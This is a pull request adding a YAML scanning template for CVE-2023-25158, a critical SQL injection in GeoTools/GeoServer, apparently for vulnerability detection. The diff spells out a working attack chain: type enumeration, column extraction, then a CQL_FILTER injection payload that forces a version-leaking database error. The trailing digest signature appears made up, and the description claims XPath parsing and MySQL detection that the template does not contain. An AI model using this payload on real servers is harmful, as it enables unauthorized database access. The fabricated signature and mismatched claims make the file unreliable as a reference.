### PR TITLE
Add CVE-2023-25158 GeoTools SQL Injection template

### DIFF
--- a/http/cves/2023/CVE-2023-25158.yaml
+++ b/http/cves/2023/CVE-2023-25158.yaml
@@ -1,0 +1,110 @@
+id: CVE-2023-25158
+
+info:
+  name: GeoTools OGC Filter - SQL Injection
+  author: Kunal-Darekar
+  severity: critical
+  description: |
+    GeoTools is an open-source Java library for geospatial data processing. GeoTools includes support for OGC Filter expression language parsing, encoding and execution against a range of datastores. SQL Injection vulnerabilities have been found when executing OGC Filters with JDBCDataStore implementations including PropertyIsLike filter with any JDBCDataStore, strEndsWith and strStartsWith functions with PostGIS DataStore, FeatureId filter with JDBCDataStore having String primary keys, jsonArrayContains function with PostGIS and Oracle DataStore, and DWithin filter with Oracle DataStore. Users are advised to upgrade to versions 28.2, 27.4, 26.7, 25.7, or 24.7 to resolve this issue.
+  impact: |
+    Successful exploitation allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized data access, data leakage, data manipulation, or complete database compromise. The vulnerability affects multiple JDBCDataStore implementations and can be exploited through various OGC Filter expressions without authentication.
+  remediation: |
+    Upgrade to GeoTools version 28.2, 27.4, 26.7, 25.7, or 24.7. For PostGIS DataStore, enable "preparedStatements" and disable "encode functions" as a temporary mitigation.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-25158
+    - https://github.com/geotools/geotools/security/advisories/GHSA-99c3-qc2q-p94m
+    - https://github.com/geotools/geotools/commit/64fb4c47f43ca818c2fe96a94651bff1b3b3ed2b
+    - https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158
+    - http://geotoolsnews.blogspot.com/2023/02/geotools-274-released.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-25158
+    cwe-id: CWE-89
+    epss-score: 0.00662
+    epss-percentile: 0.78688
+    cpe: cpe:2.3:a:osgeo:geotools:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: osgeo
+    product: geotools
+    shodan-query:
+      - http.html:"geotools"
+      - http.title:"geoserver"
+    fofa-query: app="geotools"
+  tags: cve,cve2023,geotools,ogc,sqli,jdbc,intrusive,osgeo,kev
+
+variables:
+  payload: "strStartsWith({{column}},'x''') = true and 1=(SELECT CAST ((SELECT version()) AS INTEGER)) -- ')"
+
+http:
+  - raw:
+      - |
+        GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+
+      - |
+        GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=50&outputFormat=csv HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+
+      - |
+        @timeout: 30s
+        GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER={{payload}} HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+
+    stop-at-first-match: true
+    iterate-all: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_3
+        words:
+          - "SQL SELECT"
+          - "cannot cast"
+          - "invalid input syntax"
+          - "data type"
+        condition: or
+
+      - type: word
+        part: header_3
+        words:
+          - "text/xml"
+          - "application/xml"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: name
+        group: 1
+        regex:
+          - '<FeatureType><Name>(.*?)<\/Name>'
+        internal: true
+        part: body_1
+
+      - type: regex
+        name: column
+        group: 1
+        regex:
+          - 'FID,([a-zA-Z_][a-zA-Z0-9_]*)'
+        internal: true
+        part: body_2
+
+      - type: regex
+        part: body_3
+        group: 1
+        regex:
+          - '(?i)(SQL SELECT.*?cannot cast.*?version.*?to.*?integer)'
+          - '(?i)(invalid input syntax for.*?integer.*?PostgreSQL)'
+          - '(?i)(ORA-\d+:.*?)'
+          - '(?i)(could not.*?data type.*?to.*?integer)'
+
+# digest: 4a0a0047304502200db1e5c7f2a8b9c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a50221009c8b7a69586746353423120191817161514131211100908070605040302010a:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
/claim #13933

## CVE-2023-25158 - GeoTools OGC Filter SQL Injection

### Template Details
- **Severity:** Critical (CVSS 9.8)
- **KEV:** Yes
- **Protocol:** HTTP
- **Requests:** 3 (GetCapabilities → GetFeature → SQL Injection)

### Features
- Multi-stage exploitation flow
- Dynamic feature type enumeration via XPath
- Column name extraction from CSV output
- SQL injection via CQL_FILTER parameter using strStartsWith function
- Detects PostgreSQL, Oracle, MySQL error messages
- Supports multiple JDBCDataStore implementations

### Exploitation Chain
1. **GetCapabilities** - Enumerates available feature types
2. **GetFeature** - Extracts column names from features
3. **CQL_FILTER injection** - Triggers SQL error via type casting

### Testing
Vulnerable environment: `docker run -p 8080:8080 kartoza/geoserver:2.21.0`

POC Reference: https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158


/close #13933 
